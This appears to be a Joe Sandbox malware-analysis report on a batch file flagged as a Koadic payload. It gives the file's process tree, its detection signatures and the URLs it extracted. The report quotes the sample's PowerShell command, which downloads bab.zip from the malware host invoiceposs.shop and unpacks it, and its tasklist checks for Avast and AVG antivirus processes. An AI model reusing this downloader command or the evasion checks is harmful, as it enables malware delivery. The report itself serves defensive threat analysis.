Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
new.bat

Overview

General Information

Sample name:new.bat
Analysis ID:1554412
MD5:7b66e627772c9938b6aa1295f677440e
SHA1:f205c9ef9b3c1792b10970ba1b49ffdbba35ef9d
SHA256:37ff3fde213752b29ba69ac327b27de8f4e93d6de8534e0cb0f781c1a493c2ab
Tags:batuser-VaudCERT
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
AI detected suspicious sample
Infects executable files (exe, dll, sys, html)
Loading BitLocker PowerShell Module
Suspicious powershell command line found
AV process strings found (often used to terminate AV products)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 3624 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Acrobat.exe (PID: 5076 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\BPMLNOBVSB.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
      • AcroCEF.exe (PID: 7268 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
        • AcroCEF.exe (PID: 7576 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=1544 --field-trial-handle=1512,i,14252116939018401224,568622444743397094,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
    • timeout.exe (PID: 5592 cmdline: timeout /t 5 REM Wait for PDF to open (adjust timeout as needed) MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • tasklist.exe (PID: 5596 cmdline: tasklist /FI "IMAGENAME eq AvastUI.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • find.exe (PID: 3756 cmdline: find /i "AvastUI.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • tasklist.exe (PID: 1780 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • find.exe (PID: 5640 cmdline: find /i "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
    • powershell.exe (PID: 3756 cmdline: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoiceposs.shop:9005/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • powershell.exe (PID: 4336 cmdline: powershell -Command "try { Expand-Archive -Path 'C:\Users\user\Downloads\downloaded.zip' -DestinationPath 'C:\Users\user\Downloads\Extracted' -Force } catch { exit 1 }" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • svchost.exe (PID: 7376 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
new.batMALWARE_BAT_KoadicBATKoadic post-exploitation framework BAT payloadditekSHen
  • 0x2:$s1: &@cls&@set
  • 0x5d:$s2: :~53,1%%
  • 0x6a:$s2: :~34,1%%
  • 0x77:$s2: :~55,1%%
  • 0x84:$s2: :~33,1%%
  • 0x91:$s2: :~2,1%%
  • 0x9d:$s2: :~15,1%%
  • 0xaa:$s2: :~2,1%%
  • 0xb6:$s2: :~38,1%%
  • 0xc3:$s2: :~38,1%%
  • 0xdb:$s2: :~25,1%%
  • 0xe8:$s2: :~34,1%%
  • 0xf5:$s2: :~3,1%%
  • 0x101:$s2: :~16,1%%
  • 0x10e:$s2: :~2,1%%
  • 0x123:$s2: :~55,1%%
  • 0x130:$s2: :~21,1%%
  • 0x13d:$s2: :~16,1%
  • 0x150:$s2: :~15,1%%
  • 0x15d:$s2: :~22,1%%
  • 0x16a:$s2: :~43,1%%

System Summary

barindex
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4336, TargetFilename: C:\Users\user\Downloads\Extracted\Python\Launcher\py.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoiceposs.shop:9005/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoiceposs.shop:9005/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoiceposs.shop:9005/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", ProcessId: 3756, ProcessName: powershell.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoiceposs.shop:9005/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoiceposs.shop:9005/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoiceposs.shop:9005/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", ProcessId: 3756, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoiceposs.shop:9005/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoiceposs.shop:9005/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\new.bat" ", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3624, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "try { [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-WebRequest -Uri 'http://invoiceposs.shop:9005/bab.zip' -OutFile 'C:\Users\user\Downloads\downloaded.zip' } catch { exit 1 }", ProcessId: 3756, ProcessName: powershell.exe
Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7376, ProcessName: svchost.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: http://invoiceposs.shop:9005/FTSP.zipAvira URL Cloud: Label: malware
Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.4% probability
Source: Binary string: <li><a href="library/pdb.html#pdb.Pdb.set_trace">(pdb.Pdb method)</a> source: genindex-S.html.17.dr
Source: Binary string: .pdbrc source: genindex-Symbols.html.17.dr
Source: Binary string: <li><p>The <a class="reference internal" href="../library/pdb.html#module-pdb" title="pdb: The Python debugger for interactive interpreters."><code class="xref py py-mod docutils literal notranslate"><span class="pre">pdb</span></code></a> module now reads the <code class="file docutils literal notranslate"><span class="pre">.pdbrc</span></code> configuration file with source: 3.11.html.17.dr

Spreading

barindex
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSystem file written: C:\Users\user\Downloads\Extracted\Python\Python312\Doc\html\c-api\tuple.htmlJump to behavior
Source: 2.5.html.17.drString found in binary or memory: <span class="k">with</span> <span class="n">closing</span><span class="p">(</span><span class="n">urllib</span><span class="o">.</span><span class="n">urlopen</span><span class="p">(</span><span class="s1">&#39;http://www.yahoo.com&#39;</span><span class="p">))</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span> equals www.yahoo.com (Yahoo)
Source: codecs.py.17.drString found in binary or memory: http://bugs.python.org/issue19619
Source: filesystem.py.17.drString found in binary or memory: http://bugs.python.org/issue22107
Source: filesystem.py.17.drString found in binary or memory: http://bugs.python.org/issue2528
Source: svchost.exe, 0000000A.00000002.3029148950.000001EF13200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: transports.py.17.drString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.kill
Source: transports.py.17.drString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.returncode
Source: transports.py.17.drString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.terminate
Source: svchost.exe, 0000000A.00000003.1822470393.000001EF12F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: svchost.exe, 0000000A.00000003.1822470393.000001EF12F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: svchost.exe, 0000000A.00000003.1822470393.000001EF12F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: svchost.exe, 0000000A.00000003.1822470393.000001EF12F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 0000000A.00000003.1822470393.000001EF12F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 0000000A.00000003.1822470393.000001EF12F78000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 0000000A.00000003.1822470393.000001EF12FAD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: xml.etree.elementtree.html.17.drString found in binary or memory: http://example.org/&quot;
Source: svchost.exe, 0000000A.00000003.1822470393.000001EF13067000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000008.00000002.2388491689.0000025731818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://invoiceposs.shop:9005
Source: powershell.exe, 00000008.00000002.2387867292.000002572F7E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://invoiceposs.shop:9005/FTSP.zip
Source: powershell.exe, 00000008.00000002.2388213776.000002572FAA4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2435985047.0000025749990000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://invoiceposs.shop:9005/FTSP.zipHOMEDRIVE=C:HOMEPATH=
Source: powershell.exe, 00000008.00000002.2387867292.000002572F7E9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2435985047.0000025749A05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://invoiceposs.shop:9005/bab.zip
Source: powershell.exe, 00000008.00000002.2387867292.000002572F7E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://invoiceposs.shop:9005/bab.zip.
Source: powershell.exe, 00000008.00000002.2387867292.000002572F7E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://invoiceposs.shop:9005/bab.zip?
Source: powershell.exe, 00000008.00000002.2387867292.000002572F7E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://invoiceposs.shop:9005/bab.zipO#
Source: powershell.exe, 00000008.00000002.2431123146.00000257417A6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2431123146.0000025741663000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.2388491689.0000025731818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: req_file.cpython-312.pyc.17.drString found in binary or memory: http://pubs.opengroup.org/onlinepubs/9699919799/
Source: powershell.exe, 00000008.00000002.2388491689.00000257315F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: README.ctypes.17.dr, fetch_macholib.bat.17.drString found in binary or memory: http://svn.red-bean.com/bob/macholib/trunk/macholib/
Source: powershell.exe, 00000008.00000002.2388491689.0000025731818000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: unittest.mock-examples.html.17.drString found in binary or memory: http://www.dabeaz.com/coroutines/index.html
Source: unittest.mock-examples.html.17.drString found in binary or memory: http://www.dabeaz.com/generators/
Source: floatingpoint.html.17.drString found in binary or memory: http://www.indowsway.com/floatingpoint.htm
Source: xml.sax.handler.html.17.drString found in binary or memory: http://xml.org/sax/features/external-general-entities&quot;
Source: xml.sax.handler.html.17.drString found in binary or memory: http://xml.org/sax/features/external-parameter-entities&quot;
Source: xml.sax.handler.html.17.drString found in binary or memory: http://xml.org/sax/features/namespace-prefixes&quot;
Source: xml.sax.handler.html.17.drString found in binary or memory: http://xml.org/sax/features/namespaces&quot;
Source: xml.sax.handler.html.17.drString found in binary or memory: http://xml.org/sax/features/string-interning&quot;
Source: xml.sax.handler.html.17.drString found in binary or memory: http://xml.org/sax/features/validation&quot;
Source: xml.sax.handler.html.17.drString found in binary or memory: http://xml.org/sax/properties/declaration-handler&quot;
Source: xml.sax.handler.html.17.drString found in binary or memory: http://xml.org/sax/properties/dom-node&quot;
Source: xml.sax.handler.html.17.drString found in binary or memory: http://xml.org/sax/properties/lexical-handler
Source: xml.sax.handler.html.17.drString found in binary or memory: http://xml.org/sax/properties/lexical-handler&quot;
Source: xml.sax.handler.html.17.drString found in binary or memory: http://xml.org/sax/properties/xml-string&quot;
Source: base64.py.17.drString found in binary or memory: http://zgp.org/pipermail/p2p-hackers/2001-September/000316.html
Source: powershell.exe, 00000008.00000002.2388491689.00000257315F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: 3.8.html.17.drString found in binary or memory: https://ark.intel.com/content/www/us/en/ark/products/76088/intel-core-i7-4960hq-processor-6m-cache-u
Source: 3.8.html.17.drString found in binary or memory: https://blog.unicode.org/2019/05/unicode-12-1-en.html
Source: interactive.html.17.drString found in binary or memory: https://bpython-interpreter.org/
Source: pythread.h.17.drString found in binary or memory: https://bugs.python.org/issue31370
Source: typeobj.html.17.drString found in binary or memory: https://bugs.python.org/issue40217
Source: pystate.h.17.drString found in binary or memory: https://bugs.python.org/issue45953#msg412046.
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1054041
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=10544
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1230540
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=13153
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=13611
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=15248
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1529353
Source: 3.1.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1580
Source: 3.1.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1655
Source: 3.1.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1664
Source: 3.1.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1696199
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17239
Source: 3.1.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1739468
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17535
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17561
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=17611
Source: 3.1.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=1818
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=18748
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=20092
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=20849
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=21145
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=2122
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=21536
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=22640
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=23057
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=23722
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=23831
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=23867
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=24412
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=2504
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=25427
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=25451
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=26219
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=26467
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=26707
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=26836
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=26978
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=27181
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=28238
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=29209
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=29235
Source: 3.1.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=2983
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=29883
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30262
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30661
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30670
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30688
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=30977
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31508
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31553
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=31680
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32102
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32117
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32285
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32314
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32380
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32388
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32417
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32430
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32489
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32492
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32528
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32718
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32749
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32751
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32892
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32941
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=32972
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=33041
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=33073
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=33083
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=33089
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=33106
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=33234
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=33407
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=33416
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=33462
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=33499
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=33530
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=33597
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=33671
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=33695
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=33710
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=33721
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=33725
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=33818
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=33897
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=33899
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=34003
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=34075
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=34160
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=34270
Source: 3.1.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=3439
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=34616
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=34632
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=34641
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=34651
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=34659
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=34670
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=34687
Source: 3.8.html.17.drString found in binary or memory: https://bugs.python.org/issue?&#64;action=redirect&amp;bpo=34790
